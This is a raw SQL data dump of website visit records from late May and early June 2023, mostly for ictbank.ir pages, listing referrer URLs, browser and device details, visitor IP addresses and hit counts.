(33560,'2023-05-31','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.215.107.247','000',0,1,0),
(33561,'2023-05-31','https://ictbank.ir/blog','Chrome','Windows','111.0.0.0','desktop','Unknown','','49.13.8.26','000',0,1,0),
(33562,'2023-05-31','https://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','47.92.24.158','000',0,4,0),
(33563,'2023-05-31','http://ns11.design-arena.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','101.36.119.105','000',0,5,0),
(33564,'2023-05-31','https://ictbank.ir/blog','Firefox','Linux','73.0','desktop','Unknown','','159.65.184.166','000',0,1,0),
(33565,'2023-05-31','https://ictbank.ir/blog','Chrome','Windows','101.0.0.0','desktop','Unknown','','116.203.34.83','000',0,1,0),
(33566,'2023-05-31','https://ictbank.ir/productmatrix/admin/index.php?pid=products','Chrome','OS X','113.0.0.0','desktop','Macintosh','','34.211.181.141','000',0,1,0),
(33567,'2023-05-31','https://ictbank.ir/productmatrix/admin/index.php?pid=products','Chrome','OS X','113.0.0.0','desktop','Macintosh','','79.132.212.174','000',0,32,0),
(33568,'2023-05-31','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.156.182.93','000',0,2,0),
(33569,'2023-05-31','https://ictbank.ir/blog','Yandex Browser','Android','23.0.0.0.0','mobile:smart','Reno 5 Lite','','93.159.230.87','000',0,1,0),
(33570,'2023-05-31','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,4,0),
(33571,'2023-05-31','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.218.57.224','000',0,2,0),
(33572,'2023-05-31','https://ictbank.ir/blog','Chrome','OS X','113.0.0.0','desktop','Macintosh','','35.87.68.67','000',0,1,0),
(33573,'2023-05-31','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(33574,'2023-05-31','https://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','39.103.187.166','000',0,2,0),
(33575,'2023-05-31','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.130.40.133','000',0,1,0),
(33576,'2023-05-31','https://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','39.103.168.88','000',0,2,0),
(33577,'2023-05-31','https://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','94.247.172.129','000',0,1,0),
(33578,'2023-05-31','https://ictbank.ir/blog','Chrome','OS X','113.0.0.0','desktop','Macintosh','','54.190.4.6','000',0,1,0),
(33579,'2023-05-31','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','146.59.52.85','000',0,1,0),
(33580,'2023-05-31','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,4,0),
(33581,'2023-05-31','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.189.52.51','000',0,1,0),
(33582,'2023-05-31','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(33583,'2023-05-31','https://ictbank.ir/blog','Chrome','Windows','98.0.0.0','desktop','Unknown','','179.43.142.31','000',0,2,0),
(33584,'2023-05-31','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.156.55.73','000',0,1,0),
(33585,'2023-05-31','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.130.154.221','000',0,1,0),
(33586,'2023-05-31','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,4,0),
(33587,'2023-05-31','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.111.112','000',0,1,0),
(33588,'2023-05-31','https://l.instagram.com/','Instagram','iOS','285.0.0.0.0','mobile:smart','iPhone 11','','84.241.204.131','000',0,1,0),
(33589,'2023-05-31','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(33590,'2023-05-31','https://mail.ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.135.63','000',0,1,0),
(33591,'2023-05-31','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(33592,'2023-06-01','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','129.226.208.150','000',0,1,0),
(33593,'2023-06-01','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,6,0),
(33594,'2023-06-01','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','45.79.114.20','000',0,1,0),
(33595,'2023-06-01','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,12,0),
(33596,'2023-06-01','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,4,0),
(33597,'2023-06-01','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,2,0),
(33598,'2023-06-01','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,4,0),
(33599,'2023-06-01','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(33600,'2023-06-01','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,4,0),
(33601,'2023-06-01','https://45.92.94.221/blog','Chrome','Windows','92.0.0','desktop','Unknown','','152.32.141.206','000',0,19,0),
(33602,'2023-06-01','https://ictbank.ir/productmatrix/admin/index.php?pid=reports&fid=companies_brands','Chrome','OS X','113.0.0.0','desktop','Macintosh','','5.238.244.167','000',0,9,0),
(33603,'2023-06-01','https://45.92.94.221/blog','Firefox','Windows','79.0','desktop','Unknown','','164.52.0.92','000',0,1,0),
(33604,'2023-06-01','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(33605,'2023-06-01','https://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','47.92.152.150','000',0,1,0),
(33606,'2023-06-01','https://ictbank.ir/blog','Chrome','Windows','96.0.0.0','desktop','Unknown','','23.146.240.163','000',0,1,0),
(33607,'2023-06-01','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','113.0.0.0','desktop','Unknown','','78.39.181.60','000',0,87,0),
(33608,'2023-06-01','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,12,0),
(33609,'2023-06-01','https://ictbank.ir/blog','Opera','Windows','84.0.0.0','desktop','Unknown','','93.158.90.142','000',0,1,0),
(33610,'2023-06-01','https://ictbank.ir/blog','Opera','Windows','84.0.0.0','desktop','Unknown','','93.158.90.169','000',0,1,0),
(33611,'2023-06-01','https://ictbank.ir/blog','Opera','Windows','84.0.0.0','desktop','Unknown','','93.158.90.136','000',0,1,0),
(33612,'2023-06-01','https://ictbank.ir/blog','Opera','Windows','84.0.0.0','desktop','Unknown','','93.158.90.162','000',0,1,0),
(33613,'2023-06-01','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,4,0),
(33614,'2023-06-01','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','18.237.244.224','000',0,2,0),
(33615,'2023-06-01','https://mail.design-arena.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.154.252','000',0,1,0),
(33616,'2023-06-01','http://ictbank.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','139.59.77.216','000',0,1,0),
(33617,'2023-06-01','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(33618,'2023-06-01','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.210.130.147','000',0,1,0),
(33619,'2023-06-01','http://design-arena.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','157.245.107.85','000',0,1,0),
(33620,'2023-06-01','https://ictbank.ir/hooman/admin/','Chrome','OS X','113.0.0.0','desktop','Macintosh','','34.211.181.141','000',0,14,0),
(33621,'2023-06-01','https://45.92.94.221/blog','Chrome','Linux','44.0.0.0','desktop','Unknown','','167.71.39.138','000',0,3,0),
(33622,'2023-06-01','https://ictbank.ir/hooman/admin/index.php?pid=students&student_id=43&func=courses','Chrome','OS X','113.0.0.0','desktop','Macintosh','','83.121.70.188','000',0,41,0),
(33623,'2023-06-01','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','188.165.22.2','000',0,2,0),
(33624,'2023-06-01','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,2,0),
(33625,'2023-06-01','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.128.105.100','000',0,1,0),
(33626,'2023-06-01','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','178.62.46.116','000',0,6,0),
(33627,'2023-06-01','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','109.169.10.2','000',0,3,0),
(33628,'2023-06-01','https://ictbank.ir/blog','Firefox','Windows','53.0','desktop','Unknown','','66.220.149.7','000',0,1,0),
(33629,'2023-06-01','https://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.122','000',0,2,0),
(33630,'2023-06-01','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','143.244.175.97','000',0,2,0),
(33631,'2023-06-01','https://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','103.148.202.127','000',0,2,0),
(33632,'2023-06-01','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,1,0),
(33633,'2023-06-01','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','166.62.122.244','000',0,1,0),
(33634,'2023-06-01','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','128.90.102.25','000',0,10,0),
(33635,'2023-06-01','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(33636,'2023-06-01','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','170.106.119.125','000',0,1,0),
(33637,'2023-06-01','https://45.92.94.221:443/blog','Chrome','Windows','98.0.0.0','desktop','Unknown','','106.75.147.108','000',0,4,0),
(33638,'2023-06-01','https://ictbank.ir/blog','Chrome','Windows','58.0.0.0','desktop','Unknown','','34.201.66.220','000',0,2,0),
(33639,'2023-06-01','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','5.196.176.254','000',0,1,0),
(33640,'2023-06-01','https://45.92.94.221/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','45.156.128.32','000',0,2,0),
(33641,'2023-06-02','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(33642,'2023-06-02','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','5.196.176.254','000',0,1,0),
(33643,'2023-06-02','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','94.158.149.174','000',0,6,0),
(33644,'2023-06-02','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,8,0),
(33645,'2023-06-02','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(33646,'2023-06-02','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,4,0),
(33647,'2023-06-02','http://ictbank.ir','Safari','iOS','9.0','tablet','iPad','','185.29.8.207','000',0,1,0),
(33648,'2023-06-02','https://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(33649,'2023-06-02','https://ictbank.ir/blog','Chrome','iOS','92.0.0.0','mobile:smart','iPhone','','188.225.24.12','000',0,1,0),
(33650,'2023-06-02','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.156.225.198','000',0,1,0),
(33651,'2023-06-02','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,4,0),
(33652,'2023-06-02','https://ictbank.ir/PG/','Chrome','OS X','113.0.0.0','desktop','Macintosh','','192.15.32.106','000',0,243,0),
(33653,'2023-06-02','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','69.167.12.24','000',0,10,0),
(33654,'2023-06-02','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','198.71.236.2','000',0,1,0),
(33655,'2023-06-02','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(33656,'2023-06-02','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.130.154.221','000',0,4,0),
(33657,'2023-06-02','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,5,0),
(33658,'2023-06-02','https://www.google.com/','Edge','Windows','113.0.0.0','desktop','Unknown','','88.157.72.206','000',0,2,0),
(33659,'2023-06-02','https://ictbank.ir/blog','Chrome','Windows','35.0.0.0','desktop','Unknown','','103.148.202.127','000',0,2,0),
(33660,'2023-06-02','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,6,0),
(33661,'2023-06-02','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.156.204.173','000',0,1,0),
(33662,'2023-06-02','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,2,0),
(33663,'2023-06-02','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.60','000',0,2,0),
(33664,'2023-06-02','https://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','47.92.152.150','000',0,1,0),
(33665,'2023-06-02','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','69.167.12.36','000',0,1,0),
(33666,'2023-06-02','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','165.227.212.141','000',0,2,0),
(33667,'2023-06-02','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','212.71.233.20','000',0,1,0),
(33668,'2023-06-02','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.134.128.174','000',0,2,0),
(33669,'2023-06-02','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.90.201.209','000',0,1,0),
(33670,'2023-06-02','https://webmail.design-arena.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.133.48','000',0,1,0),
(33671,'2023-06-02','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,4,0),
(33672,'2023-06-02','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.254.25.10','000',0,1,0),
(33673,'2023-06-02','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.251.14.232','000',0,1,0),
(33674,'2023-06-02','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.88.78.6','000',0,1,0),
(33675,'2023-06-02','https://ictbank.ir/blog','Firefox','Windows','71.0','desktop','Unknown','','45.140.169.22','000',0,2,0),
(33676,'2023-06-02','https://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','8.142.168.54','000',0,2,0),
(33677,'2023-06-02','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(33678,'2023-06-02','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','88.135.68.72','000',0,1,0),
(33679,'2023-06-02','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.44','000',0,1,0),
(33680,'2023-06-02','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','74.84.150.150','000',0,2,0),
(33681,'2023-06-02','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','114.55.170.111','000',0,1,0),
(33682,'2023-06-02','https://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','39.101.140.2','000',0,1,0),
(33683,'2023-06-02','https://www.google.com/','Firefox','Linux','111.0','desktop','Unknown','','151.236.166.159','000',0,1,0),
(33684,'2023-06-02','https://webmail.design-arena.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.132.239','000',0,1,0),
(33685,'2023-06-02','https://ictbank.ir/dashtpodcast/wp-content/uploads/2020/04/Badizadeh-Yeki-Ye-Poole-Khoroos.mp3','Safari','iOS','16.0','mobile:smart','iPhone','','172.96.114.170','000',0,1,0),
(33686,'2023-06-02','https://ictbank.ir/blog','Internet Explorer','Windows','11.0','desktop','Unknown','','222.243.111.55','000',0,1,0),
(33687,'2023-06-02','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.213.113.158','000',0,1,0),
(33688,'2023-06-02','https://docs.google.com/','Chrome','Windows','114.0.0.0','desktop','Unknown','','185.167.73.3','000',0,1,0),
(33689,'2023-06-02','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,4,0),
(33690,'2023-06-02','https://ictbank.ir/golrang_payment/major_buyers/','Chrome','Android','112.0.0.0','mobile:smart','Unknown','','104.28.246.162','000',0,30,0),
(33691,'2023-06-02','https://ictbank.ir/golrang_payment/major_buyers/','Chrome','Android','112.0.0.0','mobile:smart','Unknown','','104.28.214.162','000',0,30,0),
(33692,'2023-06-02','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,1,0),
(33693,'2023-06-02','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.204.67.79','000',0,1,0),
(33694,'2023-06-02','http://design-arena.ir','Internet Explorer','Windows','6.0','desktop','Unknown','','185.42.170.203','000',0,1,0),
(33695,'2023-06-02','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','188.165.22.2','000',0,1,0),
(33696,'2023-06-02','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.79','000',0,2,0),
(33697,'2023-06-02','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,2,0),
(33698,'2023-06-03','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,4,0),
(33699,'2023-06-03','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(33700,'2023-06-03','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(33701,'2023-06-03','https://ictbank.ir/blog','Chrome','OS X','91.0.0.0','desktop','Macintosh','','3.143.231.127','000',0,4,0),
(33702,'2023-06-03','https://ictbank.ir/golrang_payment/ipg_link_generator.php?amount=300000&res_no=1_1_13','Safari','iOS','14.0.0','mobile:smart','iPhone','','172.93.179.12','000',0,1,0),
(33703,'2023-06-03','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','182.50.151.69','000',0,1,0),
(33704,'2023-06-03','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(33705,'2023-06-03','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','188.165.22.2','000',0,1,0),
(33706,'2023-06-03','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.134.128.174','000',0,1,0),
(33707,'2023-06-03','https://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','Galaxy S21 FE','','104.28.214.162','000',0,20,0),
(33708,'2023-06-03','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,8,0),
(33709,'2023-06-03','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(33710,'2023-06-03','https://ictbank.ir/golrang_payment/major_buyers/index.php','Chrome','Android','113.0.0.0','mobile:smart','Nexus 5','','192.15.32.106','000',0,384,0),
(33711,'2023-06-03','https://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','8.142.158.234','000',0,1,0),
(33712,'2023-06-03','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','162.215.222.154','000',0,1,0),
(33713,'2023-06-03','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','137.184.140.67','000',0,1,0),
(33714,'2023-06-03','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,2,0),
(33715,'2023-06-03','https://ictbank.ir/hooman/admin/','Chrome','Windows','113.0.0.0','desktop','Unknown','','5.237.165.188','000',0,106,0),
(33716,'2023-06-03','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','86.48.28.141','000',0,1,0),
(33717,'2023-06-03','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.190.4.226','000',0,2,0),
(33718,'2023-06-03','https://ictbank.ir/golrang_payment/major_buyers/index.php?pid=invoices&func=payments&invoice_id=1','Chrome','Android','112.0.0.0','mobile:smart','Unknown','','104.28.246.162','000',0,27,0),
(33719,'2023-06-03','https://ictbank.ir/blog','Edge','OS X','112.0.0.0','desktop','Macintosh','','54.196.139.70','000',0,166,0),
(33720,'2023-06-03','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(33721,'2023-06-03','https://ictbank.ir/blog','Firefox','Windows','36.0','desktop','Unknown','','198.54.131.119','000',0,1,0),
(33722,'2023-06-03','https://ictbank.ir/blog','Firefox','Windows','102.0','desktop','Unknown','','62.122.184.129','000',0,1,0),
(33723,'2023-06-03','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.204.131.16','000',0,2,0),
(33724,'2023-06-03','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,4,0),
(33725,'2023-06-03','https://45.92.94.221:443/blog','Firefox','OS X','32.0','desktop','Macintosh','','148.153.45.237','000',0,8,0),
(33726,'2023-06-03','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.219.51.255','000',0,1,0),
(33727,'2023-06-03','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','113.0.0.0','desktop','Unknown','','5.238.109.80','000',0,4,0),
(33728,'2023-06-03','https://www.google.com/','Firefox','Linux','113.0','desktop','Unknown','','151.236.166.159','000',0,1,0),
(33729,'2023-06-03','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','66.240.192.138','000',0,1,0),
(33730,'2023-06-03','https://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','5.134.186.166','000',0,1,0),
(33731,'2023-06-03','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(33732,'2023-06-03','https://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(33733,'2023-06-03','https://ictbank.ir/pwa-master/','Chrome','Android','112.0.0.0','mobile:smart','Unknown','','89.196.2.239','000',0,11,0),
(33734,'2023-06-03','https://45.92.94.221/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','185.233.19.46','000',0,2,0),
(33735,'2023-06-03','https://ictbank.ir/blog','Firefox','Windows','110.0','desktop','Unknown','','54.36.113.142','000',0,2,0),
(33736,'2023-06-03','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','178.159.37.41','000',0,2,0),
(33737,'2023-06-03','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','5.196.176.254','000',0,1,0),
(33738,'2023-06-04','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,2,0),
(33739,'2023-06-04','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,4,0),
(33740,'2023-06-04','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','14.20.186.209','000',0,1,0),
(33741,'2023-06-04','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,4,0),
(33742,'2023-06-04','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','170.106.52.212','000',0,6,0),
(33743,'2023-06-04','https://ictbank.ir/blog','Firefox','OS X','5.0.0','desktop','Macintosh','','208.80.194.122','000',0,2,0),
(33744,'2023-06-04','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','5.196.176.254','000',0,2,0),
(33745,'2023-06-04','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,6,0),
(33746,'2023-06-04','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.204.131.16','000',0,2,0),
(33747,'2023-06-04','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,4,0),
(33748,'2023-06-04','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','185.142.236.40','000',0,2,0),
(33749,'2023-06-04','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(33750,'2023-06-04','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,4,0),
(33751,'2023-06-04','https://ictbank.ir/pwa-master/','Chrome','Android','112.0.0.0','mobile:smart','Unknown','','104.28.214.162','000',0,54,0),
(33752,'2023-06-04','https://ictbank.ir/pwa-master/','Chrome','Android','112.0.0.0','mobile:smart','Unknown','','104.28.246.162','000',0,52,0),
(33753,'2023-06-04','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,1,0),
(33754,'2023-06-04','https://ictbank.ir/golrang_payment/admin/index.php?signout=true','Chrome','OS X','114.0.0.0','desktop','Macintosh','','192.15.32.106','000',0,714,0),
(33755,'2023-06-04','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(33756,'2023-06-04','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','50.87.144.19','000',0,1,0),
(33757,'2023-06-04','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.37.186','000',0,2,0),
(33758,'2023-06-04','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(33759,'2023-06-04','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,4,0),
(33760,'2023-06-04','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.90.40.204','000',0,2,0),
(33761,'2023-06-04','https://ictbank.ir/golrang_payment/major_buyers/','Chrome','Android','113.0.0.0','mobile:smart','Unknown','','65.109.210.126','000',0,5,0),
(33762,'2023-06-04','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.56.83.83','000',0,1,0),
(33763,'2023-06-04','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.132','000',0,6,0),
(33764,'2023-06-04','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.100.243','000',0,1,0),
(33765,'2023-06-04','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.100.254','000',0,1,0),
(33766,'2023-06-04','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','23.129.64.222','000',0,1,0),
(33767,'2023-06-04','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.55','000',0,2,0),
(33768,'2023-06-04','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.243.218.152','000',0,5,0),
(33769,'2023-06-04','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.172','000',0,3,0),
(33770,'2023-06-04','https://ictbank.ir/golrang_payment/major_buyers/','Chrome','Android','113.0.0.0','mobile:smart','Unknown','','5.127.15.191','000',0,12,0),
(33771,'2023-06-04','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(33772,'2023-06-04','https://ictbank.ir/golrang_payment/major_buyers/','Chrome','Android','113.0.0.0','mobile:smart','Unknown','','5.161.153.122','000',0,1,0),
(33773,'2023-06-04','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','45.154.98.14','000',0,21,0),
(33774,'2023-06-04','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','71.6.135.131','000',0,2,0),
(33775,'2023-06-04','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','45.156.128.27','000',0,1,0),
(33776,'2023-06-04','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','94.102.49.193','000',0,2,0),
